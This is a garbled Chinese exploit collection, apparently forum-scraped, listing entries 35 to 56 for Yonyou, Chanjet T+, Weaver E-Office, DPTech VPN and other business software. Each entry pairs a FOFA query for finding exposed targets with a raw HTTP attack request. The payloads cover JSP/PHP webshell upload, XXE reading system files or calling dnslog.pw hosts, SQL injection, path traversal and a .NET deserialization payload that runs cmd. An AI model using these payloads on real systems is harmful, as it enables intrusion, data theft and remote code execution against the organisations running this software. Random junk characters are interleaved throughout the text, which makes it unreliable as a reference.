) c E, W( h( s/ C. o8 R D
6 }! n7 e. |* C8 Y- S* W" V* v+ z. D. K2 {1 D/ S
35. 用友NC-Cloud importhttpscer任意文件上传
$ k9 v4 n$ {# o# mFOFA:app="用友-NC-Cloud"# U, i+ s- j4 g/ P) J& L
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
- ]. u$ O* F7 W7 d. F- e: [( U7 a! NHost: 203.25.218.166:88887 \% o% W1 |$ P% y5 f
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
2 }; V* M9 q: M% r: r& n1 m2 G0 ?Accept-Encoding: gzip, deflate
) N1 {4 R( L2 g7 |" U4 A7 `4 XAccept: */*: ^7 Y; J; w) F9 K* B# N3 |& l
Connection: close
. Q5 i) ?( ]9 j% O8 VaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
( F4 q$ a$ O: W) D ?7 ^Content-Length: 190
( e* W, L" E, H. xContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
, f; z. w, c3 O8 P% d' g
P2 t9 m H7 C--fd28cb44e829ed1c197ec3bc71748df0" o' S6 E' m6 P" F
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"( i' \- |2 Z4 n9 I1 }$ ?+ _$ |
4 w6 H0 e0 v# h8 ]! {, _' A<%out.println(1111*1111);%>
$ C* m3 P. X* r! ]* w1 n/ D: m+ Z--fd28cb44e829ed1c197ec3bc71748df0--6 T: M' D& x1 ~
6 {, V3 L* E" C' c: o+ G) J- T' D' Q) t* M2 Q5 z
36. 用友NC-Cloud soapFormat XXE
5 h% P3 ~" V" l& p/ ]FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/" k3 ~" H$ @$ E* l# U
POST /uapws/soapFormat.ajax HTTP/1.1
3 C& |. \' _2 `- p2 ~5 cHost: 192.168.40.130:89893 [# Y+ t% f* f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0' a2 S- P, ]! X* f
Content-Length: 263
" d6 j) d5 `$ d1 r9 _9 ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! N* L; ?9 R8 F6 X X
Accept-Encoding: gzip, deflate0 t; b& D% p5 o' P5 U9 S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* Y/ X6 ], g2 R; Z4 J& O$ pConnection: close( t: E8 G* p2 s! O
Content-Type: application/x-www-form-urlencoded
# b9 Y8 ?' K% I; T* T7 k; hUpgrade-Insecure-Requests: 10 k I, f' b, q
6 f! F$ M; X9 L5 Zmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a$ m- Q0 B3 n) E5 @- w
) a$ j, V, z# K( W$ e" N6 F4 d3 ]
! q3 _: n* a# r6 Q4 K, ~3 c37. 用友NC-Cloud IUpdateService XXE
. Z0 r5 c* K& ?7 C) vFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
& K3 ?8 q! x/ i MPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
! J/ k+ q, n& }! e C* n3 ]Host: 192.168.40.130:8989# P" b2 ?5 Q, H+ `- p" F j1 g' o! z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.365 \1 \$ Z* `) ?9 I8 h3 ~8 @/ j
Content-Length: 421
1 _4 z. q2 @$ X4 V0 PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.97 C9 j' k: }0 f
Accept-Encoding: gzip, deflate
! E# O& B' d7 {Accept-Language: zh-CN,zh;q=0.9: j1 y: }7 v' K4 f2 c
Connection: close: ~; i, k! i/ p$ [) h9 L
Content-Type: text/xml;charset=UTF-8
% g9 G# h- d4 b; G+ f5 ?SOAPAction: urn:getResult2 i- p1 z3 ]8 g
Upgrade-Insecure-Requests: 1
* D L) U0 h" Y4 C# A: d0 P% S
* F8 _" i- O: y! a/ V* o1 X<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">7 e$ [( e- F2 O l9 R1 I
<soapenv:Header/>
. u4 D$ I1 ~: M3 N% O<soapenv:Body>
1 t0 [+ v s/ P<iup:getResult>6 b! ~1 ~% u* `$ r/ V' r3 ]
<!--type: string-->0 d! [. f3 T) z2 W; o% f% A2 W
<iup:string><![CDATA[
( ?1 \' {3 h% L. O9 t$ U2 J<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
# x Z! G! N2 p- C3 X<xxx/>]]></iup:string>9 u: c8 j( ?5 l: t" U, I5 a' H
</iup:getResult>
! A" f# g) L) x, P& ?</soapenv:Body>
0 f, D; R* G6 p</soapenv:Envelope>
6 e+ T: d$ n4 X2 `- e' P/ i4 ~1 U- ?) M
+ Z T! F, Y" |' c* j
`5 H8 j$ i8 v' \; M" u- u7 f& [38. 用友U8 Cloud smartweb2.RPC.d XXE8 h3 i" [, J: ~2 i e- v
FOFA:app="用友-U8-Cloud". _$ i+ ~+ [3 P I* w: V
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
s$ z3 c8 f& }+ \/ iHost: 192.168.40.131:8088: i- K. y* Q/ w7 D9 q& p8 q. x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.256 m" u, Z+ f( ]) d1 S7 o3 \
Content-Length: 260
" K p! h: q/ S+ }4 o6 ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
. b$ m! A/ C- B( \( H8 v1 z. h# rAccept-Encoding: gzip, deflate9 ^- i. C# s) J5 M, l, W/ y0 }1 l
Accept-Language: zh-CN,zh;q=0.94 N* z4 u r8 w: m; t; T
Connection: close& |9 c+ B0 j7 l2 _: f
Content-Type: application/x-www-form-urlencoded
2 g( f# q7 x4 r$ h6 P' I/ S& S; N' z) z# Q+ x3 ^
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>+ P1 P8 `, t' g& h# d
4 J1 O8 D( X1 j T
7 D( X. a! G7 ~# V T39. 用友U8 Cloud RegisterServlet SQL注入; o' K6 I2 M& S% B. m
FOFA:title="u8c": d, Z( K; T: p# l
POST /servlet/RegisterServlet HTTP/1.1
. U( ? j: C9 PHost: 192.168.86.128:8089) P i/ A* x8 F& a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36, B" o' v2 _; e) u: R: I
Connection: close' i$ G9 g9 z4 Z1 T
Content-Length: 85" X- P0 Y5 O* A
Accept: */*4 ?0 W; h6 h, j3 s/ Z
Accept-Language: en0 w; x7 X( Z6 F
Content-Type: application/x-www-form-urlencoded' i( k% ^' A* x% L- b: Q" j( I
X-Forwarded-For: 127.0.0.1. g, c" Q: @. I1 O4 f p
Accept-Encoding: gzip: n5 C) [& S# a. X' f( }" {; J- }
$ ]/ r2 G- V+ Eusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--7 y& B' P1 k1 W% f6 Z8 l. S+ P! X# |
# @- @, ~9 R+ w3 s+ \$ K; Q
! ~1 Z H6 [' q( w3 d- t1 ^40. 用友U8-Cloud XChangeServlet XXE, j6 [2 ?+ ^5 ]* K; A
FOFA:app="用友-U8-Cloud"
/ l, B) B0 n. M( `8 iPOST /service/XChangeServlet HTTP/1.1
: ]* f) k4 @2 ?$ sHost: x.x.x.x+ \3 T' u4 ` q# a& U5 h* ]' X+ o2 q/ ]
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.363 d5 o% D! w8 z
Content-Type: text/xml7 j/ B8 i* L+ w
Connection: close6 A9 j8 w2 w- z6 [3 @
9 P: l1 R* Y- b; u! n2 [<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
5 i/ q0 A I- M
4 j+ u( O; H7 W- S! ~
! n& Y9 \5 h$ U: H) I41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
" b! b# T) [+ S1 p) x0 oFOFA:app="用友-U8-Cloud"
3 ~( H* x, C, \* ~% L8 n t, YGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1- S4 Y9 p. n6 b% k5 o3 M
Host:* e$ d6 }, v! ?$ t5 A9 R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 U3 x) F7 o" j$ R" |
Content-Type: application/json
8 @. S4 V! m2 VAccept-Encoding: gzip! l- D H x! \9 z2 n
Connection: close
& ~7 H( S, i) _; m$ T# a/ u
4 K4 a1 ]7 M$ L7 y, {! ^: E/ P. }, y/ f, K" y: w* H; s
42. 用友GRP-U8 SmartUpload01 文件上传# p( i9 F e: b* A' ]
FOFA:app="用友-GRP-U8". R: n5 a* O2 N* ^, o
POST /u8qx/SmartUpload01.jsp HTTP/1.1' N% S/ y' a6 U8 b! L3 X6 Y
Host: x.x.x.x4 [6 F& E+ P) K% F7 ^1 I
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
! R: i, q7 p; L" p/ B9 nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
: d# \" ^6 b* K9 w
( o- `, R$ c$ ?PAYLOAD) S* z0 h: q, ^
- K' C e2 F7 J4 y4 T1 [
! q" u( ?0 m& W' I+ {% ]6 l1 w$ Shttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml8 e d6 t! e" Y0 D
, X- J* \$ O! K( u7 S43. 用友GRP-U8 userInfoWeb SQL注入致RCE
6 p! s8 r, t. q% Y) T. o8 L) dFOFA:app="用友-GRP-U8"
- E9 ?0 m9 t& P# KPOST /services/userInfoWeb HTTP/1.1
8 e. D v2 i! THost: your-ip
# Z7 k: @8 Y+ m4 XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.363 [$ r9 R& K% t/ ^; E% @* Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ g" x/ L1 m: S8 n
Accept-Encoding: gzip, deflate. @2 j/ x% M9 s& h
Accept-Language: zh-CN,zh;q=0.92 I9 f! E- r4 M' m3 h+ a
Connection: close
1 i& {& z7 Q, h# o' E# SSOAPAction:
, b" U1 s" ~8 D" ]% xContent-Type: text/xml;charset=UTF-8
: p; ?- x$ V! N: l# U0 A3 M9 j2 {9 M9 c) C/ s+ p* e) ~0 K
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
9 N! G+ t7 T/ t8 l- k; ?9 R" Q2 f <soapenv:Header/>
, B) z d1 ~ Y2 Q- o <soapenv:Body>
2 ?7 U9 ^6 s" T; M1 M( [0 J <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">6 v& O. R) t o t8 B: ?6 i
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
5 o' a: \" O' @( H3 P </ser:getUserNameById>
; {( V6 A1 Q S4 @ </soapenv:Body>9 S: N/ z7 v K7 s% a0 i/ x I4 N
</soapenv:Envelope>3 j: h9 [/ M9 ~8 e# _
! B1 J. i! a0 S0 ]& P9 j1 F+ y# Y+ z' o" o5 o; W/ _$ k
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
$ A+ u2 E; C* }3 B U3 AFOFA:app="用友-GRP-U8"1 u' L+ D# f X8 ?; Z$ N) q
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
3 ~2 g7 O A& U5 ?' Z @* U/ KHost: your-ip
" o1 G ^9 [" z3 mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36, e, I4 \; z5 o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 o+ B6 O2 W( F1 O0 x6 L5 I% J
Accept-Encoding: gzip, deflate, y" Q) X: s8 ]
Accept-Language: zh-CN,zh;q=0.9
2 j o8 x+ W) ]. \# ~" J6 B( bConnection: close
5 B: |* g, ?+ U" t; K; f
; x! ]% M4 k7 S$ K' W! n( F7 M" c
45. 用友GRP-U8 ufgovbank XXE3 m; D) f( L- Y S7 U, k
FOFA:app="用友-GRP-U8"
O/ A! z/ {4 C$ ]! p0 BPOST /ufgovbank HTTP/1.1
5 J- o2 J" N/ UHost: 192.168.40.130:222
4 L# f+ ^& a! g3 U# U& ?0 Y3 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
. U# @! {& S4 W/ N0 sConnection: close1 X2 g9 n9 O& b6 m& n0 ~1 I( w
Content-Length: 161 x7 X" z& W* G* \& N; w) D) s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 y1 u! Z$ K% K0 k; I2 d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ T: L ?2 v1 O1 f. [& vContent-Type: application/x-www-form-urlencoded6 j$ M& }) z0 G5 ]2 i( j5 |3 w. d
Accept-Encoding: gzip: f4 \3 N5 E$ O6 T
D- X) R( v4 n- m9 \! U
reqData=<?xml version="1.0"?>
. S+ Q7 V2 M6 v<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
( n7 [9 z2 f6 ~$ x
! k( _ y: K1 o2 H
2 j; ^( U4 L5 P5 k4 j4 }& I2 ~46. 用友GRP-U8 sqcxIndex.jsp SQL注入
6 `; `' A: v" g# vFOFA:app="用友-GRP-U8"
7 J7 F& R0 u0 K2 n' |GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
, r" P$ \3 a) W0 v+ Z; B/ THost: your-ip
# Z, S8 \( e% m9 c9 r0 x- ?, q wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
[- d0 S1 d$ d- K; q6 bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ Q! f/ S0 q* \Accept-Encoding: gzip, deflate9 [1 Y3 ]5 a& K2 S' x
Accept-Language: zh-CN,zh;q=0.9* c, f( H2 Z* ^4 M
Connection: close7 N% N$ V7 c* ]. o& p+ i$ i8 O
$ w, Z( C. w+ T8 u/ X4 U. S: u
+ }, n I: A1 ?& P47. 用友GRP A++Cloud 政府财务云 任意文件读取. M+ o) P: }3 [! G Z0 x
FOFA:body="/pf/portal/login/css/fonts/style.css"" |. e3 |9 i, y+ ~
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1. H& b; {+ g) |% W+ a- }
Host: x.x.x.x
3 X) A* R4 z) f! @5 Y( K$ S/ n5 vCache-Control: max-age=0
" H; A+ R$ y! c; ]Upgrade-Insecure-Requests: 15 V# n! N& J% l6 C5 r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36( A |5 v! F+ ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 ?/ n- a' _( W4 x/ WAccept-Encoding: gzip, deflate, br
5 }' ?: T) x( sAccept-Language: zh-CN,zh;q=0.9
' |- L1 F* @ yIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT! [2 p1 m# c6 I. Y' O% ]
Connection: close
/ g* {9 `% Q3 v8 u
" y4 s) W$ A+ Q, H) y* n6 C$ n) M: H
2 }; S8 l h, `+ `6 f! C$ |
48. 用友U8 CRM swfupload 任意文件上传
# c: P1 _& ~/ K7 G/ S5 ~FOFA:title="用友U8CRM"3 ]* O8 }. V- {/ u6 Q0 d0 h/ m
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
6 O$ J* Z7 o# Q" y# G! yHost: your-ip
- h9 ]$ J2 y9 G9 c1 v1 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1 I) @3 b f: {8 VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
n, K/ k) ?* V/ F1 E2 n! OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: X5 [5 m2 q+ \. F
Accept-Encoding: gzip, deflate
' B! a) E9 M% Y$ |! y8 xContent-Type: multipart/form-data;boundary=----269520967239406871642430066855
4 S& Q5 T* \) w! U5 v( r------269520967239406871642430066855
; o6 J$ t, {7 p0 Y5 c& H' ?8 k4 TContent-Disposition: form-data; name="file"; filename="s.php", }- Y! C( q' |& X; w1 _" M$ C* `! t- r
1231
. L: a5 V2 \' T' s. F% g* J0 RContent-Type: application/octet-stream
q/ l' l$ `: \/ T- ~------269520967239406871642430066855
# Y' L# C- L) T( b! U5 oContent-Disposition: form-data; name="upload"
2 `' B: M2 j" |upload& @5 h2 s5 j! h3 s4 y
------269520967239406871642430066855--
" Y. ~' V) \ V# t2 {! L$ A6 W4 _( W
0 l2 b" |" H8 r( H( Y' B/ Y; M2 c, y g0 b8 U0 U; ^3 v
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
0 J9 v% L. R2 {; t, O( SFOFA:body="用友U8CRM"& p% }* S. `6 c |
1 _0 J6 H/ I- _& D5 UPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
7 c1 X$ h) S+ Z# QHost: x.x.x.x$ M+ E! G! F8 @" n2 n' l4 q ?' L a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0) f; m+ V& F0 D1 T; m
Content-Length: 3295 N" Q1 x5 ?; @/ m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) G/ F7 b3 N+ s& `2 uAccept-Encoding: gzip, deflate. M% V- l+ k6 q* P) z5 t& r3 v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 R8 D9 ^- F1 V5 ]! l! E- S
Connection: close
8 n8 |- e( z- W* N/ lContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
$ m5 _" m3 C0 T! q
9 W7 O' u% V2 G5 S* m-----------------------------vvv3wdayqv3yppdxvn3w
: n- @; r) M4 XContent-Disposition: form-data; name="file"; filename="%s.php "
$ [5 |# |$ t% N' E) ~0 RContent-Type: application/octet-stream7 g# ?, F$ l% }. [ Y8 |
+ V, e6 n, |, W6 G% q: x, z; ^8 e
wersqqmlumloqa: ]3 Q& ]: L; r+ ~
-----------------------------vvv3wdayqv3yppdxvn3w
. n; U8 f% H9 w& `Content-Disposition: form-data; name="upload"
4 o# o$ A' U7 T* ^4 W
3 p/ |0 W; a% F$ [2 Oupload
3 z: ^; x0 J. u& g% T-----------------------------vvv3wdayqv3yppdxvn3w--3 N' k3 V7 o+ t" S( a) |- y
" o, n$ T& R$ N' m
& ]7 B4 x s: X
http://x.x.x.x/tmpfile/updB3CB.tmp.php/ v/ r1 {/ K8 E4 B# \5 u
( j+ F( t8 E" A4 o3 z50. QDocs Smart School 6.4.1 filterRecords SQL注入- Z! u1 A D2 c) ?! ^$ e
FOFA:body="close closebtnmodal"
0 h0 X O/ e8 s5 n: gPOST /course/filterRecords/ HTTP/1.1
% d0 [, W) w# d% ]6 T! wHost: x.x.x.x( C7 ^ }, }8 D7 M h( c
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.362 ]0 h" z4 R7 L' Z- @
Connection: close- e0 b) A( R" c$ |- w
Content-Length: 224
/ T) j( K/ S& SAccept: */*
7 a: Q& v3 A- c OAccept-Language: en5 L: u ?; T. [4 P) W, q% |
Content-Type: application/x-www-form-urlencoded$ s x8 W; h9 |( h( k
Accept-Encoding: gzip0 B1 q4 ?) s! B: v4 p( |
6 M! x T" ^; J, v y# X
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
/ n& j2 Y( F: H i' W# e( ?/ x v6 E' ^, \
. V& r/ ~9 u9 R0 g. R: }
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入8 u$ F5 \1 \ ?: J/ Z( b1 L) d q
FOFA:app="云时空社会化商业ERP系统"
' \6 {4 |( W, Z& Q$ M( }GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.11 {) m+ T' a6 V% M' e, y* D8 R
Host: your-ip5 |6 Y- e7 w5 {0 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36# b8 g4 K9 z- H5 j' o |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9( b5 ?; K, p. a) o# b
Accept-Encoding: gzip, deflate
( |! m: ]0 W" p5 n Y: m8 X qAccept-Language: zh-CN,zh;q=0.9/ O6 G: y4 Y* x8 }
Connection: close) J# s% A" N" Z; y1 h; o( T' p1 y
9 S( K0 [/ t" x) J
- K5 V e. M$ l2 a8 G
52. 泛微E-Office json_common.php sql注入. P8 V! A1 t: j1 G/ T6 G# ]
FOFA:app="泛微-EOffice"
# \9 w5 u- q9 I4 p& G( tPOST /building/json_common.php HTTP/1.16 S! G1 j. q; M8 s
Host: 192.168.86.128:8097( I, X) ?' b6 B' ]9 |6 x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
9 S( A% v& k# l( \2 J7 X wConnection: close
8 K2 n: C# `5 z v( zContent-Length: 87
# Q7 O U& }$ c# j3 K5 x HAccept: */*# r- P) W' Y" Q7 M8 u3 g
Accept-Language: en" Z* {# N! w3 Q: F6 O$ p
Content-Type: application/x-www-form-urlencoded
7 m7 f( H/ O. {! ~/ o9 i0 gAccept-Encoding: gzip
# |' t8 \, I) y3 R
" ]% L) \ P) Ptfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
; `: l" B4 E- b' K" e5 z1 n( Q
" Y, }8 {. K9 b3 m q8 B) {
* y* i6 {. z4 G2 r; |53. 迪普 DPTech VPN Service 任意文件上传
7 z! B2 m( A$ _& {FOFA:app="DPtech-SSLVPN". `6 @) I7 k; T9 o' f$ m0 p
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd) I3 `9 O% {+ Q% K
( G' l8 \# i1 j1 K
: ?+ j0 b& F1 B, V4 a5 W+ R! w# @
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
% j. a3 ?, E* v! e$ T6 \; pFOFA:app="畅捷通-TPlus"
2 B7 J$ {- y4 Q2 F! `- I第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
$ C% ^ i2 }2 p& g"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"6 I! D* M7 L; v4 |. g+ M" m
* c& L1 X/ p' u$ e r- L
; \7 c" J) {5 i1 c" Y8 H1 D完整数据包
' p* B: A2 i$ m1 d3 I% hPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
( F& i4 E1 P* x- m0 rHost: x.x.x.x0 y1 V- [3 h( Q& N% @
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F6 \: f' Z2 E& j3 F
Content-Length: 593' L8 l) S/ O/ M D5 `4 F* r
" m" D4 c9 b$ _" a1 U- |/ ~2 b3 N
{
0 |1 I* P5 m4 _. X"storeID":{
' O% D: u0 x2 q% o, h7 R- _ "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
8 H; }$ M* }4 _: q9 h "MethodName":"Start",! C2 w& j1 r8 I7 O
"ObjectInstance":{1 P+ `! A6 y/ ], i
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",( Z$ V, i" B" @" v8 O
"StartInfo":{
4 F* |: B& a7 a5 ^. O1 P) f( F "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
0 l9 v, b6 U1 l0 s9 o "FileName":"cmd",5 `% c. P; D, B; x
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
/ ?' M( _8 }; A }
1 ?; k- O( ?* i- L) D* B }
. M* j) f' [! t! b# D: H1 k: N }
& Q) ` j3 }8 ]" ^}1 C# |! [1 J: [
# i% j/ T6 g; ]: [! {( k( k9 ]. Z
0 p3 h: [4 w; n- ?$ l" c1 ]3 V第二步,访问如下url% d( S' Y& t: B% j3 a' g! e+ m
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
2 P2 j- X" Z4 g1 W2 g! K8 S. Z% j2 G( `5 i7 W5 z. ?
/ b6 H: U4 F# e2 R
55. 畅捷通T+ getdecallusers信息泄露3 ]# ]" P: H3 ^$ U3 Z8 K! b
FOFA:app="畅捷通-TPlus"
4 e: u( U: O7 B9 ^" I, K第一步,通过
( J; _! [/ t0 z1 x. U0 t/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
% P* d" c* b, i: d! q第二步,利用获取到的Cookie请求( Q! ]- e+ [, Y9 V
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
4 ?3 g* v/ W* O* j
% E! ]4 x/ I* a# Q8 o2 f/ l; V56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE1 s6 \# U# \# M! D8 s
FOFA: app="畅捷通-TPlus"7 a X2 c7 R9 b" M+ o" a+ Q( p
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.19 ^/ D+ N" c' c2 U; R7 }
Host: x.x.x.x
